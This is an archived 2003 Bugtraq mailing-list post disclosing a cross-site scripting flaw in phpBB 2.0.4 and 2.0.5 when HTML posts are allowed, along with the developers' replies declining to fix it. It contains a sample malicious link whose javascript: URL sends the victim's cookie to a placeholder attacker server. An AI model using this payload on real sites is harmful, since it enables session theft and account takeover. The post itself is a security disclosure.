XSS vulnerability in phpBB

From: Marvin Massih (GroennDemon_at_web.de)
Date: 08/18/03

  • Next message: Crispin Cowan: "Re: Buffer overflow prevention" 
    Date: Mon, 18 Aug 2003 21:56:59 +0200
To: bugtraq <bugtraq@securityfocus.com>

    Hi,

    I have found a dangerous vunlerability in phpBB.
    I've verified that versions 2.0.5 and 2.0.4 (AFAIK the two latest versions)
    are affected, but probably more versions are vulnerable.

    If HTML is enabled for postings, a user can post a link like this:

    <a
    href="javascript:document.location.replace('http://www.evil-server.com/cgi-bin/evil.cgi?stolen_cookie='
    + document.cookie);">Click me, I'm innocent</a>

    If a user clicks it, his cookie will be sent to the attacker, which he
    can use to log on as the user if autologon is enabled.

    I reported this vulnerability to the phpBB developers (which wasn't
    that easy as they had trouble with their mail server), that was about
    three weeks ago.

    However, the developers don't want to fix it:

    "The main developer decided that this isn't a security issue, because it
    is not able to re-parse every single allowed html tag. The bbcode tag
    [url] is absolutely suitable for displaying urls, therefore allowing the
    a html tag is a risk the Administrator has to take."

    Again, I asked them to fix it, I couldn't believe they were serious.
    This time I told them they should do something soon - or at least tell
    me that they're working on it - , otherwise I'd finally publish the
    information.

    The response was:

    "Actually, after second thoughts I don't see this issue as a security
    flaw on our side, enabling unchecked HTML is taking the same risk as
    allowing users to use <script> tags. I'm in favor of putting a notice
    warning the admin of the potential security risk when enabling given
    tags but trying to fix that on our side will cause more problems that it
    will solve."

    So, I'm publishing this information now, hoping that this will help.

    AFAIK a new version, 2.0.6 is out now, but as they refused fixing this
    issue I don't know if there is any difference.

    Regards,

    Marvin

  • Next message: Crispin Cowan: "Re: Buffer overflow prevention"

    Relevant Pages

    • Re: Absolute page width wanted
      ... >Absolute Positioning is a pretty advanced topic. ... Each tag ... >done, prior to CSS. ... OUTSIDE of the HTML tag, ...
      (microsoft.public.frontpage.programming)
    • Re: How it works?(about while loop and regex as condition)
      ... It then checks that $_ can find an opening HTML tag that starts with ... ending HTML tag an captures it into $1. ... Shared Hosting, Reseller Hosting, Dedicated & Semi-Dedicated servers ...
      (comp.lang.perl.misc)
    • Struts: XHTML support
      ... We're using Struts 1.1, which has an "xhtml" attribute for the ... rendered html tag, which is not allowed in xhtml 1.1. ... "name" attribute in the form tag, ...
      (comp.lang.java.programmer)
    • Re: Regex to get the
      ... you start on an undefined tag, and you;re matching the html tag, not the head tag. ... Then again, if you're concerned with invalid attributes, you'd have to allow for the possibility the quotes are erronous too, i.e. someone forgot to open or close them. ...
      (comp.lang.php)
    • Re: mp3 synchronised lyrics
      ... AFAIK you can put anything into an ID3v2 tag.... ... advanced tag editor built into WMP10 you can add pictures. ... I want the lyrics inside the mp3 tags => one file only... ...
      (microsoft.public.dotnet.languages.vb)